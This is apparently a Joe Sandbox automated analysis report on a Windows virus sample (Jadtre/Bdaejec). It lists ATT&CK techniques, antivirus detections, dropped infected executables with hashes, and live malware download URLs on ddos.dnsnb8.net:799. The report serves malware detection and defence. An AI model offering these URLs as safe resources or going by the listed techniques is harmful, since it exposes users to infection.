    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CE757 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_001CE757
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Windows Defender\MsMpEng.exe
    Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: JdEV.exe PID: 7800, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: JdEV.exe PID: 7800, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    11
    Masquerading
    31
    Input Capture
    12
    System Time Discovery
    1
    Taint Shared Content
    31
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory1
    Query Registry
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager131
    Security Software Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain Credentials3
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync23
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    BXOZIGZEUa.exe95%ReversingLabsWin32.Virus.Jadtre
    BXOZIGZEUa.exe88%VirustotalBrowse
    BXOZIGZEUa.exe100%AviraW32/Jadtre.B
    BXOZIGZEUa.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\JdEV.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\JdEV.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\JdEV.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://ddos.dnsnb8.net:799/cj//k1.rarL100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESS100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net/$3100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar;100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rarD100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rarDC:100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.raro100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarY100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rars100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rar-100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarx100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rars100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net/j&a100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar$100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net/x&100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarQ100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarL100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net/100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://ddos.dnsnb8.net:799/cj//k2.rartrue
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://ddos.dnsnb8.net:799/cj//k2.rarYJdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ddos.dnsnb8.net:799/cj//k2.rarCHITECTURE=x86PROCESSJdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rar;JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          unknown
          http://www.scintilla.org/scite.rngSciTE.exe.3.drfalse
            high
            http://www.rftp.comJosiahSciTE.exe.3.drfalse
              high
              http://www.activestate.comSciTE.exe.3.drfalse
                high
                http://www.activestate.comHolgerSciTE.exe.3.drfalse
                  high
                  http://ddos.dnsnb8.net/$3JdEV.exe, 00000003.00000002.1613503596.0000000001263000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://ddos.dnsnb8.net:799/cj//k1.rarsJdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEJdEV.exe, 00000003.00000003.1360033401.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613273850.0000000000343000.00000002.00000001.01000000.00000004.sdmpfalse
                    high
                    http://upx.sf.netAmcache.hve.3.drfalse
                      high
                      http://www.rftp.comSciTE.exe.3.drfalse
                        high
                        http://ddos.dnsnb8.net:799/cj//k1.rarLJdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://ddos.dnsnb8.net:799/cj//k2.raroJdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.baanboard.comBrendonSciTE.exe.3.drfalse
                          high
                          http://ddos.dnsnb8.net:799/cj//k1.rarDC:JdEV.exe, 00000003.00000003.1379761142.0000000001241000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://www.smartsharesystems.com/SciTE.exe.3.drfalse
                            high
                            http://ddos.dnsnb8.net:799/cj//k1.rarDJdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.scintilla.orgSciTE.exe.3.drfalse
                              high
                              http://www.spaceblue.comMathiasSciTE.exe.3.drfalse
                                high
                                http://ddos.dnsnb8.net:799/cj//k2.rar-JdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://www.smartsharesystems.com/MortenSciTE.exe.3.drfalse
                                  high
                                  http://ddos.dnsnb8.net:799/cj//k2.rarxJdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://ddos.dnsnb8.net:799/cj//k2.rarsJdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://ddos.dnsnb8.net/j&aJdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.develop.comSciTE.exe.3.drfalse
                                    high
                                    http://www.lua.orgSciTE.exe.3.drfalse
                                      high
                                      http://ddos.dnsnb8.net/x&JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://ddos.dnsnb8.net/JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.spaceblue.comSciTE.exe.3.drfalse
                                        high
                                        http://www.baanboard.comSciTE.exe.3.drfalse
                                          high
                                          http://www.develop.comDeepakSciTE.exe.3.drfalse
                                            high
                                            http://ddos.dnsnb8.net:799/cj//k2.rarQJdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://ddos.dnsnb8.net:799/cj//k1.rar$JdEV.exe, 00000003.00000003.1379761142.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://ddos.dnsnb8.net:799/cj//k2.rarLJdEV.exe, 00000003.00000002.1613503596.0000000001223000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            44.221.84.105
                                            ddos.dnsnb8.netUnited States
                                            14618AMAZON-AESUSfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1585133
                                            Start date and time:2025-01-07 06:00:08 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 4s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:13
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:BXOZIGZEUa.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
                                            Detection:MAL
                                            Classification:mal66.spre.troj.evad.winEXE@7/16@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 43
                                            • Number of non-executed functions: 346
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.45, 40.126.32.68, 20.109.210.53
                                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            00:01:36API Interceptor1x Sleep call for process: WerFault.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            44.221.84.105PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • bumxkqgxu.biz/vnlfrtbjm
                                            ArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                            aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                            yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                            gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                            • ddos.dnsnb8.net:799/cj//k1.rar
                                            REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                            • saytjshyf.biz/xoqfqirqhp
                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                            • npukfztj.biz/edmrjb
                                            http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
                                            • setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                            • saytjshyf.biz/eglmpsrvxnyx
                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                            • saytjshyf.biz/peioi
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            s-part-0017.t-0009.t-msedge.netw3245.exeGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            w3245.exeGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052aGet hashmaliciousHTMLPhisherBrowse
                                            • 13.107.246.45
                                            Jeffparish.docxGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            AllItems.htmGet hashmaliciousHTMLPhisherBrowse
                                            • 13.107.246.45
                                            Vernales Restaurant-encrypted.pdfGet hashmaliciousHTMLPhisherBrowse
                                            • 13.107.246.45
                                            https://sign.zoho.com/zsguest?locale=en&sign_id=234b4d535f4956235d3ed2bb80da1204238e412cdfe561cf1e7cff409a79a97da8a2d431ccef9065ebae57f03416d61f0971abb897fde199a21f0da5d9085251df31eb6747d99920190103a51a045e3e309308fa5f3a1ca3&action_type=SIGNGet hashmaliciousHTMLPhisherBrowse
                                            • 13.107.246.45
                                            https://scales.mn/file/one-drv11.htmlGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            https://www.figma.com/design/Sw6t5vElBVmnrFNiteka8B/Untitled-(Copy)?node-id=0-1&p=f&t=x9aFU3FgLH1rkKBK-0Get hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            ddos.dnsnb8.netArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                            • 44.221.84.105
                                            #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                            • 44.221.84.105
                                            #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                            • 44.221.84.105
                                            gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                            • 44.221.84.105
                                            ib.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                            • 44.221.84.105
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AMAZON-AESUShttps://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                            • 3.233.158.25
                                            https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253Get hashmaliciousKnowBe4Browse
                                            • 52.55.210.33
                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 54.86.71.160
                                            arm5.elfGet hashmaliciousMiraiBrowse
                                            • 107.22.157.131
                                            spc.elfGet hashmaliciousMiraiBrowse
                                            • 54.136.161.121
                                            sh4.elfGet hashmaliciousMiraiBrowse
                                            • 107.23.89.175
                                            m68k.elfGet hashmaliciousMiraiBrowse
                                            • 34.236.109.145
                                            arm4.elfGet hashmaliciousMiraiBrowse
                                            • 52.90.71.108
                                            mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 44.200.217.194
                                            https://app.saner.ai/shared/notes/7353e5ae-dd5f-410b-92c3-210c9e88052aGet hashmaliciousHTMLPhisherBrowse
                                            • 3.81.241.106
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\JdEV.exeArjM1qx3hV.exeGet hashmaliciousBdaejecBrowse
                                              aRxo3E278B.exeGet hashmaliciousBdaejecBrowse
                                                yRc7UfFif9.exeGet hashmaliciousBdaejecBrowse
                                                  gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
                                                    #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                      #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                        #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                                                          gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                                                            ib.exeGet hashmaliciousBdaejecBrowse
                                                              SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):19456
                                                                Entropy (8bit):6.5908093222053585
                                                                Encrypted:false
                                                                SSDEEP:384:1FuSuXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:vqQGPL4vzZq2o9W7GsxBbPr
                                                                MD5:51111F182D4F0EAC7373F27A9F9E9218
                                                                SHA1:756D557FF1771C82F2EB77813FA1C906146C0882
                                                                SHA-256:ACBBF8743A45715724FD6E22C5551B13DB06915658934EBD9D76BAC0C4E12C1E
                                                                SHA-512:515242B4B65E9FE775B7CA5F83514598C2D79AD2E41FC8CF56971FDFD1F8E2FB647ED822F3F0BC319885D507C8E418E8CFBA84E2F56F5D8BB9B9FF3C051D4E01
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2389504
                                                                Entropy (8bit):6.731341679292559
                                                                Encrypted:false
                                                                SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                                MD5:F8B6911C0F07C2D33AEFCA1C460DC739
                                                                SHA1:04E31D2444A6D09B5751C0058A6C6E778086FBF6
                                                                SHA-256:C023BA9B0DDAB2F70299B10A77DE2E65F38B1EE44374256564948AE2EE1CBBE0
                                                                SHA-512:5A8FFA086E573E2475A1D8C1F929051A0EBA31326691000C9F062ADEAE8DB7BE33D92767A90ADF375B6F9F2BA0350DE00BEF85D6F1CC04F415FA1A62B65AB225
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\JdEV.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):31744
                                                                Entropy (8bit):6.366383934301566
                                                                Encrypted:false
                                                                SSDEEP:768:uWQ3655Kv1X/qY1MSdiRQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdiWGCq2iW7z
                                                                MD5:C1F7D7BAC6B1A4852A5213295E0CA54F
                                                                SHA1:6BFB881AF5336F9D33DAB770A2E6BB9D25BDA5E6
                                                                SHA-256:3A4CC784C554665C0C85907B63D920DF1C7CDA4255EB3E08ED2D22F874103A72
                                                                SHA-512:62BE725E5F8A7C30A889A4F0739EC46207F8067E43E6C8FE1154F8411E641B3F07EF75148B3DDCB59D782291D21819879996B9DC67687778C5B00C0E0491B4AB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):65536
                                                                Entropy (8bit):0.9841408264427419
                                                                Encrypted:false
                                                                SSDEEP:192:BnNoxvi6UI0fyRmgf63j8/h9zuiFcgZ24IO8erB6:BOxvi6Ujf8mw63jgzuiFcgY4IO8erB
                                                                MD5:01007032CB861D1325D94F906225347B
                                                                SHA1:EB0FFD64C30171368621B876934A64F8FAEF1B1A
                                                                SHA-256:CBFDA3F1DFA9314C049669284A57C21A5B82B379089227A3806EAC1B5494BF57
                                                                SHA-512:85F563BB9B300B9FA0E122904F15201A01D73AD74019903A77E6053B0F122AED94970878017A30E73662A736560113060C3DC8212396B4DF69E947030C37144D
                                                                Malicious:false
                                                                Reputation:low
